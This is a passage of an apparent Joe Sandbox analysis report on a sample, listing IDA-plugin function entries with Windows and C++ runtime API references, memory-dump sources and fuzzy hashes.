                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9419c62d196da06191a65e9d687afebd8a953dc122ae93fbb6ab85d721b2845b
                                      • Instruction ID: 82b462bab30e54ab3408811d96fcf62ad4685e74d16e4e234bd146f41c6d1e40
                                      • Opcode Fuzzy Hash: 9419c62d196da06191a65e9d687afebd8a953dc122ae93fbb6ab85d721b2845b
                                      • Instruction Fuzzy Hash: 9F11B172918214BBDB207F768C49E6B7B6CEFC6770B118629B815D7251DA388901DBA0
                                      APIs
                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 0095974E
                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00959767
                                      • PMDtoOffset.LIBCMT ref: 0095978D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FindInstanceTargetType$Offset
                                      • String ID: Bad dynamic_cast!
                                      • API String ID: 1467055271-2956939130
                                      • Opcode ID: 07c904f09cb801acaf473ab4871d8013036ae78c85adee1072f6ec22b61c36d2
                                      • Instruction ID: 5848d3f1d08ce7cf453dcedca2f871b2444559d55ed1ffb10236da6828e36876
                                      • Opcode Fuzzy Hash: 07c904f09cb801acaf473ab4871d8013036ae78c85adee1072f6ec22b61c36d2
                                      • Instruction Fuzzy Hash: 60212672A10205EFEF14DFA6CD06BAE37B8FB88711F10461AED1197180D734E90987A1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Mpunct$GetcvtGetvalsH_prolog3
                                      • String ID: $+xv
                                      • API String ID: 2737107202-1686923651
                                      • Opcode ID: 650a4fb0d6bbecb0bc5a5787d6ba430130ed26026d1cbedba9fe1e6e82a4b209
                                      • Instruction ID: fdb7bf4ef7cc679a79e741a4c45933a04dd713fa2f0df2f19a07bf7d2a034791
                                      • Opcode Fuzzy Hash: 650a4fb0d6bbecb0bc5a5787d6ba430130ed26026d1cbedba9fe1e6e82a4b209
                                      • Instruction Fuzzy Hash: 2721B0B1904B566ED729DF74888073BBEF8AF48300F044A1AE499C7A42D734EA45CFA0
                                      APIs
                                        • Part of subcall function 0097DDCA: _free.LIBCMT ref: 0097DDF3
                                      • _free.LIBCMT ref: 0097E0D1
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 0097E0DC
                                      • _free.LIBCMT ref: 0097E0E7
                                      • _free.LIBCMT ref: 0097E13B
                                      • _free.LIBCMT ref: 0097E146
                                      • _free.LIBCMT ref: 0097E151
                                      • _free.LIBCMT ref: 0097E15C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 1f344ad25b2dc88bb6b0102a31732e2654b900e7b075d54f964a6f3a38e806a5
                                      • Instruction ID: 039deb6a849f2c3fe0b0e57fe585df140fcb4af32722d6413760b5b11e8275e2
                                      • Opcode Fuzzy Hash: 1f344ad25b2dc88bb6b0102a31732e2654b900e7b075d54f964a6f3a38e806a5
                                      • Instruction Fuzzy Hash: 4F115E73581B04EAD630FBB0CD0BFCB77ADAF84B00F848C15B69EA6492DA75B5048650
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0094E05B
                                      • GetCurrentThreadId.KERNEL32 ref: 0094E062
                                      • atomic_compare_exchange.LIBCONCRT ref: 0094E070
                                      • atomic_compare_exchange.LIBCONCRT ref: 0094E094
                                        • Part of subcall function 00929C01: mtx_do_lock.LIBCPMT ref: 00929C09
                                      • __Mtx_unlock.LIBCPMT ref: 0094E0B9
                                      • __Cnd_broadcast.LIBCPMT ref: 0094E0CF
                                      • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0094E0E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_CurrentH_prolog3Mtx_unlockReleaseThreadmtx_do_lock
                                      • String ID:
                                      • API String ID: 420504553-0
                                      • Opcode ID: 9495af8183974098c70a93c4318a5763e5625f84809d6982fcf581120e8ef128
                                      • Instruction ID: 8e48682f8b2eb57976b41cb6d41b21bfeebf1d6f695ce60e13d041d33da965ce
                                      • Opcode Fuzzy Hash: 9495af8183974098c70a93c4318a5763e5625f84809d6982fcf581120e8ef128
                                      • Instruction Fuzzy Hash: 1A01B1B5D0160567CB10BBB49D47F9EB39DBF85310F504511F82497282DF78EA5087A6
                                      APIs
                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FCC
                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FD2
                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FFF
                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00943009
                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 0094301B
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00943031
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094303F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                      • String ID:
                                      • API String ID: 4227777306-0
                                      • Opcode ID: 571ecb02615c81e4f10fa136017c2e9a6a8ea3ae1c12b3672687778f09f1abed
                                      • Instruction ID: 4d72f91e9d1a10d0344cb0609ef34445cf37e95732330047a4556a6700dc77e5
                                      • Opcode Fuzzy Hash: 571ecb02615c81e4f10fa136017c2e9a6a8ea3ae1c12b3672687778f09f1abed
                                      • Instruction Fuzzy Hash: 09018F31618105A7CB20AF7ADD0AFAF776CEB80751F50852AF511E20A1EF24EE049B64
                                      APIs
                                      • TlsGetValue.KERNEL32(FFFFFFFF,BA3649C5,?,?,?,?,?,00990D68,000000FF), ref: 00940B15
                                      • TlsSetValue.KERNEL32(FFFFFFFF,?), ref: 00940B59
                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00990D68,000000FF), ref: 00940B7F
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,00990D68,000000FF), ref: 00940B86
                                      • GetProcessHeap.KERNEL32(00000000), ref: 00940BC0
                                      • HeapFree.KERNEL32(00000000), ref: 00940BC7
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00940BD0
                                      • HeapFree.KERNEL32(00000000), ref: 00940BD7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess$Value
                                      • String ID:
                                      • API String ID: 3709577838-0
                                      • Opcode ID: ba6af8400aba9c617b480b9361ecdbc20ea69a4d1824cf3fd51a9c9b32522f6b
                                      • Instruction ID: 6fd63b20e8152603fc7de47d40705adeafd9bca6aec103b2b395bbc8c2a28ce1
                                      • Opcode Fuzzy Hash: ba6af8400aba9c617b480b9361ecdbc20ea69a4d1824cf3fd51a9c9b32522f6b
                                      • Instruction Fuzzy Hash: 6E418431A192009FDF208F69DC89F1777A8EF84725F044669FA55D7291D730DC00CB54
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: f26fe44b9a344a0565ef7ac38cb39cd088633c493726429bb978aea5682bad31
                                      • Instruction ID: f0e3cab5903fd52dc2e5d899c644d120aab2eaa246866ce3f9d7fc3eb38f96c7
                                      • Opcode Fuzzy Hash: f26fe44b9a344a0565ef7ac38cb39cd088633c493726429bb978aea5682bad31
                                      • Instruction Fuzzy Hash: 4B5138B3900205ABDB219B698C41FBE77BDEF89730F64422AF859D2182DB36DD00C664
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16
                                      • String ID: a/p$am/pm
                                      • API String ID: 3509577899-3206640213
                                      • Opcode ID: b8ffbecc1f32227dd55982809d879cba240f97081e4a773cbfd60b497a1648dc
                                      • Instruction ID: 02e6c6b87fdc488282d166b08f6c7824ad9fde8d1770ec69dc5a843e815ed49b
                                      • Opcode Fuzzy Hash: b8ffbecc1f32227dd55982809d879cba240f97081e4a773cbfd60b497a1648dc
                                      • Instruction Fuzzy Hash: 3AD15B39910206CBDB29DF68C895BFEB7B8FF05700F24455AE946AB291D3399D80CB51
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008E9619
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008E963B
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008E965B
                                      • __Getctype.LIBCPMT ref: 008E96F1
                                      • std::_Facet_Register.LIBCPMT ref: 008E9710
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008E9728
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                      • String ID:
                                      • API String ID: 1102183713-0
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008EC545
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008EC567
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008EC587
                                      • __Getcvt.LIBCPMT ref: 008EC620
                                      • std::_Facet_Register.LIBCPMT ref: 008EC657
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008EC66F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcvtRegister
                                      • String ID:
                                      • API String ID: 3552396256-0
                                      APIs
                                      • Concurrency::location::_Assign.LIBCMT ref: 00953250
                                      • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00953258
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00953282
                                      • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0095328B
                                      • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0095330E
                                      • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00953316
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                                      • String ID:
                                      • API String ID: 3929269971-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,?,BA3649C5,00000000), ref: 008B52A8
                                      • HeapFree.KERNEL32(00000000,?,BA3649C5,00000000), ref: 008B52AF
                                      • CloseHandle.KERNEL32(?,BA3649C5,76226230,?,BA3649C5,00000000,00000000,00000000), ref: 008B52D9
                                      • CloseHandle.KERNEL32(?,?,BA3649C5,00000000,00000000,00000000), ref: 008B52DE
                                      • CloseHandle.KERNEL32(?,?,BA3649C5,00000000,00000000,00000000), ref: 008B52E3
                                        • Part of subcall function 0093FC80: GetProcessHeap.KERNEL32(00000000,?,?,BA3649C5,0098EB50,000000FF,?,008B528A,BA3649C5,76226230), ref: 0093FCCB
                                        • Part of subcall function 0093FC80: HeapFree.KERNEL32(00000000,?,?,BA3649C5,0098EB50,000000FF,?,008B528A,BA3649C5,76226230), ref: 0093FCD2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Heap$CloseHandle$FreeProcess
                                      • String ID: 0b"v
                                      • API String ID: 3876841697-2229840602
                                      APIs
                                      • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0094E99C
                                        • Part of subcall function 0094FE93: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0094FEE2
                                      • GetCurrentThread.KERNEL32 ref: 0094E9A6
                                      • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0094E9B2
                                        • Part of subcall function 0094384F: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00943861
                                        • Part of subcall function 00943CF6: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00943CFD
                                      • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0094E9F5
                                        • Part of subcall function 0094FE45: SetEvent.KERNEL32(?,?,0094E9FA,0094F78E,00000000,?,00000000,0094F78E,00000004,0094FE3A,?,00000000,?,?,00000000), ref: 0094FE89
                                      • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0094E9FE
                                        • Part of subcall function 0094F474: __EH_prolog3.LIBCMT ref: 0094F47B
                                        • Part of subcall function 0094F474: List.LIBCONCRT ref: 0094F4AA
                                      • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0094EA0E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                                      • String ID:
                                      • API String ID: 2908504212-0
                                      APIs
                                      • GetLastError.KERNEL32(?,?,0095AA6F,0095860F,00984BDE,00000008,00984F36,?,?,?,?,00955737,?,?,BA3649C5), ref: 0095AA86
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0095AA94
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0095AAAD
                                      • SetLastError.KERNEL32(00000000,?,0095AA6F,0095860F,00984BDE,00000008,00984F36,?,?,?,?,00955737,?,?,BA3649C5), ref: 0095AAFF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C0B2
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C0BC
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • moneypunct.LIBCPMT ref: 0092C0F6
                                      • std::_Facet_Register.LIBCPMT ref: 0092C10D
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C12D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C14B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                      • String ID:
                                      • API String ID: 113178234-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C00C
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C016
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • moneypunct.LIBCPMT ref: 0092C050
                                      • std::_Facet_Register.LIBCPMT ref: 0092C067
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C087
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C0A5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
